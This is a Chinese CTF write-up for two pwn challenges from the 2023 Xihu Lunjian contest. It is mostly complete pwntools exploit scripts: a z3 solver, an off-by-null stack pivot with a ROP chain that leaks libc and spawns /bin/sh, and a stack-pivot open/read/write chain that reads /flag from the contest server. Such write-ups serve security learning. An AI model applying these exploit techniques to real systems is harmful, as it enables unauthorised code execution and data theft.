---
title: 2023 西湖论剑 pwn Writeup
date: 2023-02-03 19:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=55/
pin: false
published:
---

## babycalc

解密

````python
# _*_ coding:utf-8 _*_
from z3 import *

# 生成V3-V18变量
for i in range(3,19):
  locals()['v'+ str(i)]= Int('v%s'%i)

# x = Real('x') # 有理数

s = Solver()
s.add(v5 * v4 * v3 - v6 == 36182)
s.add(v3 == 19)
s.add(v5 * 19 * v4 + v6 == 36322)
s.add((v13 + v3 - v8) * v16 == 32835)
s.add((v4 * v3 - v5) * v6 == 44170)
s.add((v5 + v4 * v3) * v6 == 51590)
s.add(v9 * v8 * v7 - v10 == 61549)
s.add(v10 * v15 + v4 + v18 == 19037)
s.add(v9 * v8 * v7 + v10 == 61871)
s.add((v8 * v7 - v9) * v10 == 581693)
s.add(v11 == 50)
s.add((v9 + v8 * v7) * v10 == 587167)
s.add(v13 * v12 * v11 - v14 == 1388499)
s.add(v13 * v12 * v11 + v14 == 1388701)
s.add((v12 * v11 - v13) * v14 == 640138)
s.add((v11 * v5 - v16) * v12 == 321081)
s.add((v13 + v12 * v11) * v14 == 682962)
s.add(v17 * v16 * v15 - v18 == 563565)
s.add(v17 * v16 * v15 + v18 == 563571)
s.add(v14 == 101)
s.add((v16 * v15 - v17) * v18 == 70374)
s.add((v17 + v16 * v15) * v18 == 70518)


if s.check() == sat:
  result = s.model()
  print result

````

漏洞点在于读入数字的位置有一个offbynull，导致可以控制rbp低位为0，再结合leave_ret栈迁移实现ret滑梯的效果

通过栈溢出劫持i，从而修改ret地址为leave_ret

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("","")
p = process("./babycalc")
elf = ELF("./babycalc")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    script += 'b *0x400BA6\nc\n'
    script += 'stack 60\n'
    gdb.attach(p,script)
    # pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

solver = [19,36,53,70,55,66,17,161,50,131,212,101,118,199,24,3]


pop_rdi = 0x0000000000400ca3
pop_rsi = 0x0000000000400ca1
ret= 0x00000000004005b9
leave_ret = 0x400c18
main = 0x400650
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

for i in range(15):
    sla("number-"+str(i+1)+":",solver[i])

# ret滑梯
payload = str(0x18).ljust(8,'\x00')
payload += p64(ret)*0x10
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
payload = payload.ljust(0x100-0x30,"\x00")
payload += p64(0xa111423746352413) + p64(0x0318c77665d48332)
payload += '\x00'*0x18 + p32(0) + p32(0x38)# i
sa("number-"+str(16)+":",payload)# ret

libc_base = l64() - libc.sym["puts"]
lg("libc_base")
system_addr = libc_base + libc.sym["system"]
bin_sh = libc_base + libc.search("/bin/sh").next()


for i in range(15):
    sla("number-"+str(i+1)+":",solver[i])

payload = str(0x18).ljust(8,'\x00')
payload += p64(ret)*21
payload += p64(pop_rdi)
payload += p64(bin_sh)
payload += p64(system_addr)
# payload += p64(0x400650)
payload = payload.ljust(0x100-0x30,"\x00")
payload += p64(0xa111423746352413) + p64(0x0318c77665d48332)
payload += '\x00'*0x18 + p32(0) + p32(0x38)# i

sa("number-"+str(16)+":",payload)

ia()
```



## Message Board

就是一个栈迁移，然后调一下执行orw即可

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

p = remote("tcp.cloud.dasctf.com","23922")
# p = process("./pwn")
elf = ELF("./pwn")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------
read = 0x401378
bss = 0x404200
pop_rdi = 0x0000000000401413
pop_rsi = 0x0000000000401411
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
ret = 0x000000000040101a
main = 0x4012e3

sla("Welcome to DASCTF message board, please leave your name:",'e4l4')

pay = 'a'*0xb0+p64(bss)+p64(read)

sa("Now, please say something to DASCTF:",pay)

pay = 'a'*0xb0+p64(bss+0xb0)+p64(read)
s(pay)
pay = p64(0)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(0x40136C )
s(pay)
libc_base = l64()-0x084420
lg('libc_base')
pop_rdx = libc_base + 0x0000000000142c92
jmp_rsp = libc_base+0x0000000000002b25
Open = libc_base+libc.sym['open']
Read = libc_base+libc.sym['read']
Write = libc_base+libc.sym['write']

flag = 0x404200
pay = '/flag'.ljust(0x20,'\x00')+p64(pop_rdi)+p64(flag)+p64(pop_rsi)+p64(0)*2+p64(pop_rdx)+p64(0)+p64(Open)
pay += p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(0x404200)+p64(0)+p64(pop_rdx)+p64(0x30)+p64(Read)
pay += p64(pop_rdi)+p64(1)+p64(Write)

sa("Now, please say something to DASCTF:",pay)

ia()
```

